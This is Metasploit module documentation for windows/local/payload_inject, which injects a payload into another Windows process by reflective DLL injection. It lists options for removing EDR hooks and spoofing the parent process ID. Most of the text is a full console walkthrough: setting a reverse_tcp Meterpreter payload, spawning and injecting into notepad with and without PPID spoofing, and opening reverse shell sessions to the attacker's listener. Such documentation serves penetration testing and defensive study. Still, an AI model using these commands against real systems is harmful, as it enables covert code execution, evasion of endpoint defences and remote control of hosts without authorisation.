cgranleese-r7
9.3 KiB
9.3 KiB
Description
This module leverages the reflective ddl injection technique to spawn a payload thread in the memory of another running process. To inject into the memory of another process, the meterpreter session must have the required permissions to allocate memory and create a remote thread in the process. The architecture of the payload must match the architecture of the process into which it is injected. If no process is specified, the module will launch a notepad process matching the architecture of the selected payload then inject into it.
Side-Effects
The PPID option can crash certain processes when used. To use the PPID feature, the meterpreter session must have permission to
access the process identified by the PPID and the process may also have attributes that limit the ability to use it as a PPID. Certain
Windows Metro apps like Calc or Edge will crash if you try and use them as the PPID.
Options
msf exploit(windows/local/payload_inject) > show options
Module options (exploit/windows/local/payload_inject):
Name Current Setting Required Description
---- --------------- -------- -----------
AUTOUNHOOK false no Auto remove EDRs hooks
PID 0 no Process Identifier to inject of process to inject payload. 0=New Process
PPID 3632 no Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing)
SESSION 1 yes The session to run this module on.
WAIT_UNHOOK 5 yes Seconds to wait for unhook to be executed
Vulnerable Target
This module only works on Windows hosts.
Usage
- Create a meterpreter session on the remote host
- Begin interacting with the module:
use exploit/windows/local/payload_inject. - Set the
PAYLOADand configure it correctly. - If an existing handler is configured to receive the elevated session, then the module's
handler should be disabled:
set DisablePayloadHandler true. Make sure that theSESSIONvalue is set to the existing session identifier. - Invoke the module:
run.
Scenarios
Windows 10x64 Build 17134 No PID
msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.135.168:5555
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x64.dll is being used
WARNING: Local files may be incompatible with the Metasploit Framework
[*] Sending stage (206403 bytes) to 192.168.132.125
[*] Meterpreter session 1 opened (192.168.135.168:5555 -> 192.168.132.125:49673) at 2020-01-22 13:10:13 -0600
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x64.dll is being used
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x64.dll is being used
meterpreter > sysinfo
Computer : DESKTOP-D1E425Q
OS : Windows 10 (10.0 Build 17134).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > background
[*] Backgrounding session 1...
msf exploit(multi/handler) > use exploit/windows/local/payload_inject
msf exploit(windows/local/payload_inject) > show options
Module options (exploit/windows/local/payload_inject):
Name Current Setting Required Description
---- --------------- -------- -----------
AUTOUNHOOK false no Auto remove EDRs hooks
PID 0 no Process Identifier to inject of process to inject payload. 0=New Process
PPID 0 no Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing)
SESSION yes The session to run this module on.
WAIT_UNHOOK 5 yes Seconds to wait for unhook to be executed
Exploit target:
Id Name
-- ----
0 Windows
msf exploit(windows/local/payload_inject) > set session 1
session => 1
msf exploit(windows/local/payload_inject) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/local/payload_inject) > set lhost 192.168.135.168
lhost => 192.168.135.168
msf exploit(windows/local/payload_inject) > show options
Module options (exploit/windows/local/payload_inject):
Name Current Setting Required Description
---- --------------- -------- -----------
AUTOUNHOOK false no Auto remove EDRs hooks
PID 0 no Process Identifier to inject of process to inject payload. 0=New Process
PPID 0 no Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing)
SESSION 1 yes The session to run this module on.
WAIT_UNHOOK 5 yes Seconds to wait for unhook to be executed
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.135.168 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows
msf exploit(windows/local/payload_inject) > run
[*] Started reverse TCP handler on 192.168.135.168:4444
[*] Running module against DESKTOP-D1E425Q
[*] Spawned Notepad process 684
[*] Injecting payload into 684
[*] Preparing 'windows/x64/meterpreter/reverse_tcp' for PID 684
[*] Sending stage (206403 bytes) to 192.168.132.125
[*] Meterpreter session 2 opened (192.168.135.168:4444 -> 192.168.132.125:49676) at 2020-01-22 13:12:07 -0600
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
88 4 Registry
.
.
.
684 7524 notepad.exe x64 1 DESKTOP-D1E425Q\msfuser C:\Windows\System32\notepad.exe
.
.
.
7524 3632 revtcpx64.exe x64 1 DESKTOP-D1E425Q\msfuser C:\Users\msfuser\Desktop\revtcpx64.exe
7532 4772 chrome.exe x64 1 DESKTOP-D1E425Q\msfuser C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
7876 780 WmiPrvSE.exe
7904 780 WmiPrvSE.exe
8000 584 svchost.exe
8036 584 svchost.exe
meterpreter > getpid
Current pid: 684
meterpreter >
Windows 10x64 Build 17134 No PID
msf exploit(windows/local/payload_inject) > set PPID 3632
PPID => 3632
msf exploit(windows/local/payload_inject) > show options
Module options (exploit/windows/local/payload_inject):
Name Current Setting Required Description
---- --------------- -------- -----------
AUTOUNHOOK false no Auto remove EDRs hooks
PID 0 no Process Identifier to inject of process to inject payload. 0=New Process
PPID 3632 no Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing)
SESSION 1 yes The session to run this module on.
WAIT_UNHOOK 5 yes Seconds to wait for unhook to be executed
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.135.168 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows
msf exploit(windows/local/payload_inject) > run
[*] Started reverse TCP handler on 192.168.135.168:4444
[*] Running module against DESKTOP-D1E425Q
[*] Spawned Notepad process 1528
[*] Spoofing PPID 3632
[*] Injecting payload into 1528
[*] Preparing 'windows/x64/meterpreter/reverse_tcp' for PID 1528
[*] Sending stage (206403 bytes) to 192.168.132.125
[*] Meterpreter session 3 opened (192.168.135.168:4444 -> 192.168.132.125:49677) at 2020-01-22 13:16:31 -0600
meterpreter > getpid
Current pid: 1528
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
88 4 Registry
.
.
.
1528 3632 notepad.exe x64 1 DESKTOP-D1E425Q\msfuser C:\Windows\System32\notepad.exe
.
.
.
3632 3452 explorer.exe x64 1 DESKTOP-D1E425Q\msfuser C:\Windows\explorer.exe
.
.
.
7524 3632 revtcpx64.exe x64 1 DESKTOP-D1E425Q\msfuser C:\Users\msfuser\Desktop\revtcpx64.exe
7532 4772 chrome.exe x64 1 DESKTOP-D1E425Q\msfuser C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
7904 780 WmiPrvSE.exe
7996 780 RuntimeBroker.exe x64 1 DESKTOP-D1E425Q\msfuser C:\Windows\System32\RuntimeBroker.exe
8000 584 svchost.exe
8036 584 svchost.exe
meterpreter >